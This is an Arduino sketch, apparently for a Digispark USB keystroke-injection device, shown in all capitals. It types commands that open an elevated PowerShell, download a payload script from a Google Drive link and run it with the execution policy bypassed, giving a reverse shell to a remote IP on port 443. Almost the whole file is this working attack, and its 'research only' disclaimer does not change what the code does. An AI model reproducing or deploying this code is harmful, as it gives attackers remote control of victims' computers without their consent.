#INCLUDE “DIGIKEYBOARD.H”
#DEFINE KEY_LEFT_ARROW 0XD8
// POWERSHELL REVERSE SHELL HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=YOURDOWNLOADHERE
// WRITTEN BY JORDON LOVIK FOR RESEARCH PURPOSES ONLY. DO NOT USE OR DISTRIBUTE THIS CODE FOR ANYTHING BUT EDUCATION. I AM NO LIABLE FOR ANY HARM THIS SCRIPT MAY DO TO YOU OR ANYONE ELSES COMPUTER.
VOID SETUP() {
// RUNSPEED USE NUMBERS BETWEEN 50 – 2000
INT RUNSPEED = 500;
//DEFINE LED
PINMODE(0, OUTPUT); //LED ON MODEL B
PINMODE(1, OUTPUT); //LED ON MODEL A
DIGIKEYBOARD.DELAY(3*RUNSPEED);
//TURN LIGHT ON
DIGITALWRITE(0, HIGH);
DIGITALWRITE(1, HIGH);
DIGIKEYBOARD.SENDKEYSTROKE(0,0);
DIGIKEYBOARD.SENDKEYSTROKE(KEY_R, MOD_GUI_LEFT);
DIGIKEYBOARD.DELAY(1*RUNSPEED);
//START POWERSHELL AS ADMINISTRATOR – ENABLES YOU TO BYPASS EXECTIONS POLICY LATER
DIGIKEYBOARD.PRINTLN(“POWERSHELL START-PROCESS POWERSHELL.EXE -VERB RUNAS”);
DIGIKEYBOARD.DELAY(1*RUNSPEED);
DIGIKEYBOARD.SENDKEYSTROKE(0,0);
DIGIKEYBOARD.SENDKEYSTROKE(KEY_LEFT_ARROW);
DIGIKEYBOARD.DELAY(3*RUNSPEED);
DIGIKEYBOARD.SENDKEYSTROKE(KEY_ENTER);
//DEFINE PAYLOAD DOWNLOAD LOCATION (MAKE SURE THIS IS A DIRECT DOWNLOAD LINK)
DIGIKEYBOARD.DELAY(3*RUNSPEED);
DIGIKEYBOARD.PRINTLN(“$URL = \”HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=13DLTW-FTKKFPRYAC2DZQNM7JURZZQHQS\””);
DIGIKEYBOARD.UPDATE();
DIGIKEYBOARD.DELAY(1*RUNSPEED);
//GRABS USER NAME BASED ON LOGGED ON USER AND STORES IT IN $USER
DIGIKEYBOARD.PRINTLN(“$USER = [ENVIRONMENT]::USERNAME”);
DIGIKEYBOARD.UPDATE();
DIGIKEYBOARD.DELAY(1*RUNSPEED);
//WRITE TO CONDITIONAL OUTPUT PATH USING THE DESKTOP FOR DEBUGGING
DIGIKEYBOARD.PRINTLN(“$OUTPUT = \”C:\\USERS\\$USER\\DESKTOP\\PAYLOAD1.PS1\””);
DIGIKEYBOARD.UPDATE();
DIGIKEYBOARD.DELAY(1*RUNSPEED);
//DOWNLOAD THE PAYLOAD FROM THE SPECIFIED URL
DIGIKEYBOARD.PRINTLN(“INVOKE-WEBREQUEST -URI $URL -OUTFILE $OUTPUT”);
DIGIKEYBOARD.UPDATE();
DIGIKEYBOARD.DELAY(3*RUNSPEED);
//-WINDOWSTYLE HIDDEN
DIGIKEYBOARD.PRINTLN(“POWERSHELL.EXE -EXECUTIONPOLICY BYPASS \”C:\\USERS\\$USER\\DESKTOP\\PAYLOAD1.PS1 -DEST 172.16.31.84 -PORT 443\””); //IP
}
VOID LOOP() {
//BLINK LIGHTS WHEN SCRIPT COMPLETES
DIGITALWRITE(0, HIGH);
DIGITALWRITE(1, HIGH);
DELAY(50);
DIGITALWRITE(0, LOW);
DIGITALWRITE(1, LOW);
DELAY(50);
DIGITALWRITE(0, HIGH);
DIGITALWRITE(1, HIGH);
DELAY(20);
DIGITALWRITE(0, HIGH);
DIGITALWRITE(1, HIGH);
DELAY(20);
}
